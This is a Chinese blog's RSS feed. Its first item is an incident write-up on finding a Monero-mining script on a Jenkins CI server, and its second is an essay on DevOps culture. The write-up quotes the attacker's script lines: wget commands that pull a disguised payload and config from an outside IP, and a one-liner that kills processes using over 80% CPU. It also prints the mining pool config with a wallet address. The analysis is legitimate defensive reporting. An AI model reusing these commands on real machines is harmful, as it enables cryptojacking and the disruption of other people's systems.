<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>DevOps 文化 on 顾宇的研习笔记</title>
    <link>https://www.guyu.me/tags/devops-%E6%96%87%E5%8C%96/</link>
    <description>Recent content in DevOps 文化 on 顾宇的研习笔记</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>zh-cn</language>
    <lastBuildDate>Wed, 28 Jun 2017 00:00:00 +0000</lastBuildDate>
    
	<atom:link href="https://www.guyu.me/tags/devops-%E6%96%87%E5%8C%96/index.xml" rel="self" type="application/rss+xml" />
    
    
    <item>
      <title>你的 CI 在挖矿吗？</title>
      <link>https://www.guyu.me/2017/2017-06-28-are-your-ci-mining/</link>
      <pubDate>Wed, 28 Jun 2017 00:00:00 +0000</pubDate>
      
      <guid>https://www.guyu.me/2017/2017-06-28-are-your-ci-mining/</guid>
      <description>我们的持续集成服务器搭建在AWS上的一个EC2的虚拟机中。采用 Jenkins 2.46.1 并且只有一个Master实例来运行所有的任务。且采用持续部署——团队每天要在开发环境自动部署10+个版本。整个过程由Jenkins内部构建的流水线触发。代码提交，测试，构建，部署一气呵成。
我们有一个中心产品代码库，这个中心产品对应着不同国家的在线产品。分别是：新加坡，马来西亚，印度尼西亚和香港。为了安全起见，我们为每一个产品的环境单独部署了一套持续交付流水线。由于各地域产品的差异较小，我们采用同一套基础设施配置初始化Jenkins配置，因此，我们有四台差不多的持续交付流水线。
从一次“构建变慢“的调查说起 在周二的时候，突然有人发现”马来西亚“的部署流程开始变慢，其中构建过程从上周的的7分钟左右变成了44分钟。而同样的代码改动，其它国家的服务器并没有如此大的差异。
那么问题一定在这个服务器上！
影响构建速度的因素主要是资源的占用导致的等待，这方面的资源包括：CPU、内存、磁盘和网络。
由于我们采用NewRelic对所有的持续集成服务器进行监控。所以可以得到CPU、内存、磁盘和网络的性能监控数据以及横向的对比信息。通过对比相关的数据，我们发现这一台服务器上有个在/tmp目录下运行的叫`donns`的陌生进程长期占用大量CPU，它的文件权限属于Jenkins用户以及Jenkins用户组。所以这个程序的执行是由Jenkins出发了。
我们在Jenkins的相关网站里搜索这个名为donns进程的相关信息，但一无所获。于是我们在/tmp目录中寻找和这个进程相关的信息，我们发现了一个陌生的Shell脚本，打开内容看，内容却让我们大跌眼镜。想看脚本完整源代码的请点击这里，一下是几个重要的脚本片段：
代码片段 1:
pkill conns ps auxw|head -1;ps auxw|sort -rn -k3|head -1|awk &#39;{if(\$3\&amp;gt;80.0) print &amp;quot;kill -9 &amp;quot; \$2}&#39;|sh pkill bonns  我们看到，这段代码杀死了占用CPU超过80%的进程。此外，杀死了名为conns和bonns的进程。
conns进程是什么？bonns进程又是什么？为什么要杀死CPU占用率超过80%的进程？
代码片段 2:
wget 91.235.143.129:8086/587b626883fdc.png -O /tmp/conn wget 91.235.143.129:8086/1eac80002f.conf -O /tmp/config.conf  从91.235.143.129:8086下载了一个图片和一个配置文件。这个服务器是干嘛的？这个配置文件又包含了哪些内容？
通过在自己的沙盒环境里打开这个配置文件，发现它的内容是这样的：
{ &amp;quot;url&amp;quot; : &amp;quot;stratum+tcp://xmr.crypto-pool.fr:3333&amp;quot;, &amp;quot;user&amp;quot; : &amp;quot;43ZQzwdYHC9ebXxZhJuwkH5jvmfEBCEjkd1PvqxacrJaEDQFyNuxJhcib8MsJRgFnbATB6rpBEzq8EKqRqUbjyNy3opCS4k&amp;quot;, &amp;quot;pass&amp;quot; : &amp;quot;x&amp;quot; }  stratum+tcp 协议引发了我的好奇心，经过调查，这居然是一个叫做门罗币的加密虚拟币的矿池协议：
 门罗币XMR一种使用CryptoNote协议的一个虚拟币币种，其并不是比特币的一个分支。CryptoNote在2012年已经开发出来，当年已有Bytecoin使用CrytoNote技术，XMR是在2014年开发出来，可以预见CryptoNote技术已经非常成熟，该技术通过数字环签名提供更好的匿名性。目前国内对该币种匿名技术宣传较少，国外知名度较高。Monero词语是引自于世界语，在世界语中的含义表示为货币。
而矿池则是是比特币(Bitcoin)等P2P密码学虚拟货币开采所必须的基础设施，一般是对外开放的团队开采服务器，其存在意义为提升比特币开采稳定性，使矿工薪酬趋于稳定。
假设100万人参与比特币挖矿，全网400P算力，其中90%的矿工为1P(1000T)以下的算力，如果投入一台1T矿机，将占全网算力的40万分之1，理论上平均每40万个10分钟能挖到一个区块，也就是7.6年才能挖到一个区块然后一次性拿到50个比特币。那么，假如我再找9个拥有1T算力矿机的矿工，达成协定，我们总共10个人，其中任何一个人挖到区块，都按照每人的算力占比来进行平分，那么我们就是一个整体，总共10T算力，那么平均0.76年即可挖到一个区块，然后算下来到我们手上的就是0.76年开采到5个比特币，如果组织100人、1000人、1万人甚至10万人呢？如果是10万人，那么平均100分钟就能挖到1个区块，作为团队的一份子，我的收入将会趋于稳定。这就是矿池的基本原理，即大家组队进行比特币开采，可以参考彩票中的合买。
 当然，以上只是对矿池的基本原理和性质进行简单的描述，实际情况会非常复杂。矿池是一个全自动的开采平台，即矿机接入矿池——提供算力——获得收益。
抱着“大胆假设，小心求证”的心态，我们找到了配置文件中这家叫做crypyto-pool的网站https://monero.crypto-pool.fr/它是一个著名门罗币的矿池网站。而通过配置文件的用户名，我们看到了这个程序的挖矿记录和转账记录。根据6月份的交易数据以及对应牌价，截止作者发稿时，该程序已 为作者赚取了 1165.64 美元的收益。</description>
    </item>
    
    <item>
      <title>DevOps前世今生 - DevOps 的文化</title>
      <link>https://www.guyu.me/2017/2017-05-21-devops-culture/</link>
      <pubDate>Sun, 21 May 2017 00:00:00 +0000</pubDate>
      
      <guid>https://www.guyu.me/2017/2017-05-21-devops-culture/</guid>
      <description>用工具堆砌的DevOps 幻觉 在第一届 DevOpsDays结束后，DevOps 运动则如星火燎原之势在全球发展开来。随着 DevOps 思想的不断传播，相对的质疑和批评也从未停止过。以至于到今天对于 DevOps 的定义还是众说纷纭，争论不休。
当人们还在争论 DevOps的时候，一批基于敏捷的工程实践和自动化工具带着 DevOps 的标签走入了人们的视野。人们开始认为 DevOps 就是使用这些工具进行自动化。
在早期的 DevOps 实践里，开发和运维仍然是分离的。而在很多企业中，运维部门往往是核心部门，评审应用软件的架构设计和上线要求。于是运维部门开始利用这些被称作为“DevOps”的自动化工具管理设备和应用系统。并且将自己相关的实践打赏了“DevOps”的标签传播开来。
于此同时，开发团队开始采用这些工具构建开发用的测试环境。并将运维需求带入了开发流程中，这促进了內建质量。并且利用持续集成服务器（Continous Integration Serever） 构建持续交付流水线（Continuous delivery pipeline）来可视化软件交付的进度和流程，并通过流水线完成了自动化部署。持续集成服务器连接了开发和运维！
这就是DevOps ？
“同床异梦” 的 DevOps 虽然开发团队和运维团队使用的工具变了，然而事情却没有改变：我们仍然能看到”流程结合在一起，但工作目标仍然分离“的两个团队：运维团队仍然牢牢控制着环境，控制着上线标准和上线流程。通过补充更多自动化的测试和验证手段构建更加严格的控制着变更的入口和出口。开发团队仍然不停的为了满足运维团队制定的更加严格的开发规范更加努力的学习各种工具而不断加班。
运维团队仍然不关心开发团队是否需要帮助，开发团队也依然不了解运维团队在做什么。如果没有 DevOps文化的建立，DevOps 仅仅是“通过自动化工具和手段构建的标准流程”而已。
有人甚至开始把这两个团队融合在了一起，变成了一个团队。这在一定程度上缓解了这种矛盾，但是相互指责却并没有让团队凝聚起来更加具有战斗力。而是变成了一个缓慢而争论不休的“Dev和Ops 法庭”：项目经理或者产品经理成为了法官，Dev 和 Ops 则轮番成为原告和被告。
这不是 DevOps !
早期的 DevOps文化：信任和尊重 早在 “10+ Deploys Per Day: Dev and Ops Cooperation at Flickr” 的演讲里，就总结出了 Dev 和 Ops 的合作并不能仅仅只有工具，还需要依托文化把某些行为和价值观带到组织内部。这个演讲很有洞见的总结了 Dev 和 Ops 的不同观点和思维模式，并从 Dev 和 Ops 的立场分别给出了促进合作的建议。这其中包括：
尊重：避免成见并尊重他人的经验，观点和责任。不要只是一味的拒绝改变，或者把隐藏细节。对于Dev 来说，当和 Ops 交流的时候，则应该告诉代码对 Ops 工作的影响。</description>
    </item>
    
  </channel>
</rss>